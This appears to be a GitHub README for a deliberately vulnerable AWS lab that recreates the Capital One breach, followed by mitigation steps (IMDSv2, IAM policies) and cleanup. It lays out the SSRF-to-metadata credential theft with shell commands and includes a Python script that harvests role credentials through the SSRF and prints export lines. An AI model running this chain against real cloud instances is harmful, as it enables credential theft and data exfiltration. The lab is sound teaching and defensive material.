brianlamCC / caponeme

Repository demonstrating the Capital One breach on your AWS account

caponeme

caponeme is a deliberately vulnerable cloud environment that mocks the Capital One breach, for educational purposes only.

What is Capital One Breach?

In 2019 an attacker exploited a server-side request forgery (SSRF) flaw in a web application firewall running on an EC2 instance to reach the instance metadata service, retrieved the temporary credentials of the IAM role attached to that instance, and used them to list and download S3 buckets. This repository reproduces that chain, at small scale, in your own account.

Getting Started

  • Make sure you have a recent version of the AWS CLI (awscli) installed and configured with credentials for your account.
  • Use the us-east-1 (N. Virginia) region in the AWS Console; the lab is written for that region.

Deployment

  • Download the capmeonesim.yaml file.
  • Log in to the AWS Console.
  • Go to the CloudFormation service.
  • Create a new stack and upload the capmeonesim.yaml file you downloaded.
  • Acknowledge that the template creates IAM resources on your behalf, then create the stack.
  • Take note of the S3 bucket name in the stack's Outputs, navigate to that bucket and upload a few text files; they stand in for the data an attacker would exfiltrate.
  • Click the SSRFWebURL link in the stack's Outputs; it takes you to the vulnerable web application.

Discovering the contents of the S3 Bucket

  • Use the SSRF in the web application to make the instance fetch its own metadata service. Requesting http://169.254.169.254/latest/meta-data/iam/security-credentials/ returns the name of the IAM role attached to the instance; appending that role name to the path returns the role's temporary credentials as a JSON document like the one below (the session token is left out here):

    {
      "Code" : "Success",
      "LastUpdated" : "2019-12-22T21:42:57Z",
      "Type" : "AWS-HMAC",
      "AccessKeyId" : "ASIASANNLTVCBCFP445O",
      "SecretAccessKey" : "v0osgTGnL0n09dHQA6xztS/ZuSS3p8yu+JZ1cAxG",
      "Token" : "<SESSION-TOKEN>",
      "Expiration" : "2019-12-23T04:17:43Z"
    }

  • Type the following in a terminal (this is the "hacked" shell) to impersonate the instance's IAM role, substituting the values from your own response:

    export AWS_ACCESS_KEY_ID="ASIASANNLTVCBCFP445O"
    export AWS_SECRET_ACCESS_KEY="v0osgTGnL0n09dHQA6xztS/ZuSS3p8yu+JZ1cAxG"
    export AWS_SESSION_TOKEN="<SESSION-TOKEN>"

  • Now you can list every object in the bucket:

    aws s3api list-objects --bucket <YOUR-S3-BUCKET>

  • Then download an object to a local file (demo.txt here):

    aws s3api get-object --bucket <YOUR-S3-BUCKET> --key <YOUR-S3-OBJECT> demo.txt
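
The steps above as a script, added here as an illustration and not taken from the caponeme repository. It drives the SSRF to enumerate the instance role, pulls the IMDSv1 credential document, validates it, and prints the export lines for the hacked shell. The query parameter name `url`, the role name and the credential values in the dry-run data are assumptions, not values from the lab:

```python
"""Attacker-side tooling for the SSRF -> IMDSv1 -> role credentials chain.
Added example, not code from the caponeme repo. Assumes the vulnerable app
fetches an attacker-supplied URL given in a query parameter (`url` here is
hypothetical; adjust it to whatever the web app actually uses)."""
import json
import sys
import urllib.parse
import urllib.request
from datetime import datetime, timezone

IMDS_CREDS = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"


def fetch_via_ssrf(ssrf_url, target, param="url", timeout=10):
    """Ask the vulnerable app to fetch `target` for us and return the body.
    This is the only function that touches the network."""
    query = urllib.parse.urlencode({param: target})
    with urllib.request.urlopen(f"{ssrf_url}?{query}", timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def harvest(fetch):
    """Two requests: the role listing, then that role's credential document.
    `fetch` is any callable url -> text, so the chain runs offline in tests."""
    roles = [r.strip() for r in fetch(IMDS_CREDS).splitlines() if r.strip()]
    if not roles:
        raise RuntimeError("no IAM role attached to the instance")
    doc = json.loads(fetch(IMDS_CREDS + roles[0]))
    if doc.get("Code") != "Success":
        raise RuntimeError(f"metadata service returned Code={doc.get('Code')!r}")
    for key in ("AccessKeyId", "SecretAccessKey", "Token", "Expiration"):
        if key not in doc:
            raise RuntimeError(f"credential document is missing {key}")
    return doc


def parse_aws_time(value):
    """Parse the ISO-8601 UTC timestamps used in the credential document."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def seconds_until_expiry(doc, now=None):
    """Stolen temporary credentials keep working until Expiration; negative
    means they are already dead."""
    now = now or datetime.now(timezone.utc)
    return (parse_aws_time(doc["Expiration"]) - now).total_seconds()


def export_lines(doc):
    """The three export statements from the README, single-quoted so that
    '+' and '/' in the secret survive the shell untouched."""
    return [
        f"export AWS_ACCESS_KEY_ID='{doc['AccessKeyId']}'",
        f"export AWS_SECRET_ACCESS_KEY='{doc['SecretAccessKey']}'",
        f"export AWS_SESSION_TOKEN='{doc['Token']}'",
    ]


# Constructed sample responses standing in for the live SSRF during a dry run.
SAMPLE_RESPONSES = {
    IMDS_CREDS: "caponeme-instance-role\n",
    IMDS_CREDS + "caponeme-instance-role": json.dumps({
        "Code": "Success",
        "LastUpdated": "2019-12-22T21:42:57Z",
        "Type": "AWS-HMAC",
        "AccessKeyId": "ASIAEXAMPLE000000000",
        "SecretAccessKey": "example/secret+key/not/real",
        "Token": "example-session-token",
        "Expiration": "2019-12-23T04:17:43Z",
    }),
}


def sample_fetch(url):
    return SAMPLE_RESPONSES[url]


if __name__ == "__main__":
    # Usage: python3 harvest.py https://<SSRFWebURL>   (no argument = dry run)
    fetch = (lambda u: fetch_via_ssrf(sys.argv[1], u)) if len(sys.argv) > 1 else sample_fetch
    creds = harvest(fetch)
    hours = seconds_until_expiry(creds) / 3600
    print(f"# credentials expire {creds['Expiration']} ({hours:.1f} h from now)", file=sys.stderr)
    print("\n".join(export_lines(creds)))
```

Pipe the output into `eval` in the hacked shell, then `aws sts get-caller-identity` confirms which role you are acting as before you touch the bucket.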

Mitigation

Mitigation #1 - Require Session Tokens (IMDSv2) on the Metadata Service

  • From a privileged shell session on your AWS account (not the hacked session), require session tokens on the instance's metadata service (the option is --http-tokens; "required" switches IMDSv1 off):

    aws ec2 modify-instance-metadata-options --instance-id <INSTANCE-ID> --http-endpoint enabled --http-tokens required

  • Now go back to the vulnerable web application and repeat the SSRF against the credentials endpoint. The metadata service answers 401 Unauthorized: with tokens required it only serves requests carrying a session token, and obtaining that token takes an HTTP PUT with a TTL header, which a GET-based SSRF cannot send.

  • Caveat: the credentials you already exported into the "hacked" shell are not revoked by this change; they keep working until their Expiration, typically several hours away. If an attacker already holds them, revoke the role's active sessions from the IAM console as well.

  • Roll back by running the following command:

    aws ec2 modify-instance-metadata-options --instance-id <INSTANCE-ID> --http-endpoint enabled --http-tokens optional
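
Why requiring tokens defeats a GET-based SSRF, as an added example (not code from the repository or from AWS): a small model of the metadata service in its "optional" and "required" modes, a GET-only SSRF client, and a correct two-step IMDSv2 client. The paths and header names are the real ones; the role name is a constructed sample, and the status codes are the model's own approximation of the service's refusals:

```python
"""Model of the EC2 instance metadata service in IMDSv1 ("optional") and
IMDSv2-only ("required") modes, the values taken by
`modify-instance-metadata-options --http-tokens`. Added example; paths and
header names follow the real service, the role name is constructed."""
import secrets
import time

CRED_PATH = "/latest/meta-data/iam/security-credentials/"
TOKEN_PATH = "/latest/api/token"
TTL_HEADER = "X-aws-ec2-metadata-token-ttl-seconds"
TOKEN_HEADER = "X-aws-ec2-metadata-token"
MAX_TTL = 21600  # six hours, the maximum IMDSv2 token lifetime

SAMPLE_ROLE = "caponeme-instance-role"  # constructed sample


class MetadataService:
    def __init__(self, mode="optional", clock=time.monotonic):
        if mode not in ("optional", "required"):
            raise ValueError("mode must be 'optional' or 'required'")
        self.mode = mode
        self.clock = clock   # injectable so token expiry can be exercised
        self.tokens = {}     # session token -> expiry time (clock units)

    def handle(self, method, path, headers=None):
        """Serve one request and return (status, body)."""
        headers = headers or {}
        if method == "PUT" and path == TOKEN_PATH:
            # Token issuance. The real service also refuses token requests
            # carrying X-Forwarded-For, so a forwarding proxy cannot mint one.
            if "X-Forwarded-For" in headers:
                return 403, "forbidden"
            try:
                ttl = int(headers.get(TTL_HEADER, ""))
            except ValueError:
                return 400, "missing or invalid TTL header"
            if not 1 <= ttl <= MAX_TTL:
                return 400, "TTL out of range"
            token = secrets.token_urlsafe(32)
            self.tokens[token] = self.clock() + ttl
            return 200, token
        if method != "GET":
            return 405, "method not allowed"
        token = headers.get(TOKEN_HEADER)
        if token is not None:
            # A presented token must be one we issued and still inside its TTL.
            expiry = self.tokens.get(token)
            if expiry is None or self.clock() > expiry:
                return 401, "unauthorized"
        elif self.mode == "required":
            # No token and IMDSv1 disabled: exactly the request the SSRF makes.
            return 401, "unauthorized"
        if path == CRED_PATH:
            return 200, SAMPLE_ROLE
        return 404, "not found"


def ssrf_get_only(service, path):
    """What a Capital One-style SSRF can do: a plain GET with no headers."""
    return service.handle("GET", path)


def imdsv2_client(service, path, ttl=MAX_TTL):
    """The legitimate flow: PUT for a session token, then GET with the token."""
    status, token = service.handle("PUT", TOKEN_PATH, {TTL_HEADER: str(ttl)})
    if status != 200:
        return status, token
    return service.handle("GET", path, {TOKEN_HEADER: token})


if __name__ == "__main__":
    for mode in ("optional", "required"):
        svc = MetadataService(mode)
        print(f"{mode:8} GET-only SSRF -> {ssrf_get_only(svc, CRED_PATH)[0]}, "
              f"IMDSv2 client -> {imdsv2_client(svc, CRED_PATH)[0]}")
```

In "optional" mode both clients get the role name; in "required" mode the GET-only SSRF gets 401 while the two-step client still works, which is the behaviour you should see on the instance after the command above.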
    

Mitigation #2 - Limit Role Access Credentials to Instance Metadata Service V2

  • Go to the IAM role attached to the EC2 instance (locate the instance, then click the entity shown under "IAM role"). Choose Attach inline policy and apply the following policy:

    {
      "Version": "2012-10-17",
      "Statement": [{
        "Sid": "RunInstanceWithImdsV2Only",
        "Effect": "Allow",
        "Action": "ec2:RunInstances",
        "Resource": "*",
        "Condition": {
          "StringEquals": {
            "ec2:MetadataHttpTokens": "required"
          }
        }
      }]
    }

  • Name the policy IMDSv2InlinePolicy, press Review policy and then Create policy.

  • Try list-objects or get-object from the "hacked" shell again. The calls still succeed: the statement above is an Allow scoped to ec2:RunInstances, so all it does is let this role launch instances whose metadata options request IMDSv2 (ec2:MetadataHttpTokens = required). It keeps the next instance from exposing IMDSv1, but it grants rather than removes permissions and says nothing about the S3 calls the stolen credentials are making.
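
To actually make the role's credentials unusable unless they were obtained through IMDSv2, AWS provides the ec2:RoleDelivery condition key, whose value is the metadata service version that delivered the credentials ("2.0" for IMDSv2). The policy below is an added example, not part of the repository; attached as a second inline policy on the instance role it denies every API call made with credentials that came from IMDSv1, including ones an attacker has already exported, which is the gap Mitigation #1 leaves open:

```json
{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "DenyCredentialsDeliveredByImdsV1",
    "Effect": "Deny",
    "Action": "*",
    "Resource": "*",
    "Condition": {
      "NumericLessThan": {
        "ec2:RoleDelivery": "2.0"
      }
    }
  }]
}
```

Because it is a Deny on every action, anything on the instance that still reads credentials through IMDSv1 (an old SDK or CLI that has not been updated) loses access at the same time, so pair it with Mitigation #1 rather than using it alone.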

Cleanup

  • Empty the S3 bucket.
  • Delete the CloudFormation stack (deletion fails while the bucket still contains objects).

Todos

  • You tell me?

Credits

We're using some tech to make this work:

License

MIT
